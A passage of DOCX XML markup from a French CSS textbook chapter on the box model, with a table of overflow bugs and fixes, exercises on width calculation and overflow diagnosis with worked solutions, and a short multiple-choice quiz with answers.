        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.chiffre {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-variant-numeric: tabular-nums;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  min-width: 4ch;              /* stabilité des colonnes */</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.47 — Cinq débordements classiques et leur correction</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05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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Cause fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Défilement horizontal de la page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enfant plus large que le parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max-width: 100%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>min-width: 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Texte qui dépasse d'un bouton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Largeur insuffisante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>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padding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>white-space</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image qui casse la grille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Largeur intrinsèque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max-width: 100%; height: auto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Colonne flex qui refuse de rétrécir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>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min-width: auto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>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min-width: 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élément collé au bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Marge fusionnée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flow-root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, padding</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LE TEST DU CONTOUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Ajoutez temporairement </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>outline: 1px solid red</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à tous les éléments (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>* { outline: 1px solid red }</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>) pour visualiser les boîtes réelles. Retirez-la ensuite : c'est un outil de diagnostic, pas un style.</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Toute boîte se compose de contenu, padding, bordure et marge.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box-sizing: border-box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simplifie tous les calculs de largeur.</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marge est extérieure et transparente ; le padding est intérieur et coloré.</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marges verticales fusionnent : ce n'est pas un bug.</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display: flow-root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bloque la fusion sans artifice.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display: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> retire l'élément de l'arbre d'accessibilité.</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débordement se diagnostique en visualisant les contours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La boîte est comprise. Le chapitre suivant l'habille : bordures, ombres et effets de profondeur.</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13.1 — Calculer des largeurs</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 xml:space="preserve">Un conteneur mesure 900 px. Trois cartes ont </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width: 33.33%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>padding: 16px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border: 1px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Tiennent-elles sur une ligne ?</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Calculez avec le modèle par défaut.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 xml:space="preserve">Calculez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-box</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Proposez deux corrections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 13.2 — Reproduire une carte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Reproduisez cette carte : 320 px de large, fond blanc, bordure de 1 px, coins arrondis, ombre douce, image en haut, texte avec marges internes.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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-box</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Ajoutez un espacement interne cohérent.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la largeur réelle dans l'inspecteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 13.3 — Diagnostiquer un débordement</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La page défile horizontalement sur mobile, sans qu'aucune image ne soit visiblement trop large.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Proposez trois causes possibles.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Indiquez la commande CSS de diagnostic.</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Corrigez la cause la plus probable.</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13.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Modèle par défaut : chaque carte occupe 300 px de contenu + 32 px de padding + 2 px de bordure = 334 px, soit 1002 px pour trois : débordement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, chaque carte occupe 300 px, soit 900 px au total : elles tiennent exactement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deux corrections : activer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>box-sizing: border-box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> globalement, ou utiliser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display: grid; grid-template-columns: repeat(3, 1fr); gap: 1rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en laissant la grille gérer les largeurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 13.2</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.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-sizing: border-box;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: min(320px, 100%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 1px solid #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 12px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overflow: hidden;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: 0 6px 20px rgb(15 46 76 / 10%);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.carte__image { display: block; width: 100%; height: 180px; object-fit: cover;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>.carte__corps { padding: 1.25rem; }</w:t>
        <w:br/>
        <w:t>.carte__titre { margin: 0 0 .5rem; font-size: 1.125rem; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow: hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur la carte empêche l'image de dépasser des coins arrondis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dans l'inspecteur, la largeur de la boîte doit afficher 320 px, padding et bordure compris : c'est la preuve que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est actif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 13.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Causes : un élément en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width: 100vw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dépasse de la largeur de la barre de défilement), une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec des colonnes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contenant un élément insécable, ou une marge négative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>* { outline: 1px solid red }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puis repérez l'élément qui sort de l'écran. L'inspecteur affiche aussi la largeur du document.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html, body { overflow-x: hidden; }  /* masque le symptôme */</w:t>
        <w:br/>
        <w:t>/* Correction réelle : */</w:t>
        <w:br/>
        <w:t>.grille { grid-template-columns: minmax(0, 1fr); }</w:t>
        <w:br/>
        <w:t>.large { width: 100%; max-width: 100%; }</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 xml:space="preserve">Que comprend la largeur d'un élément avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>box-sizing: border-box</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Le contenu seul</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Contenu + padding + bordure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Contenu + marge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Tout, marge comprise</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 devient l'espace entre deux marges verticales de 20 px et 30 px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50 px</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30 px</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20 px</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0 px</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 xml:space="preserve">Quelle valeur de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> retire l'élément de l'arbre d'accessibilité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none</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hidden</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contents</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inline-block</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Quel mode d'affichage empêche la fusion des marges avec l'extérieur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display: block</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display: flow-root</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display: inline</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display: table</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Quelle propriété espace les enfants d'un conteneur flex sans marge extérieure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margin</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gap</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padding</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border-spacing</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inclut padding et bordure dans la largeur déclarée ; la marge reste extérieure.</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Les marges verticales adjacentes fusionnent : la plus grande l'emporte, soit 30 px.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supprime l'élément du rendu et de l'arbre d'accessibilité ; </w:t>
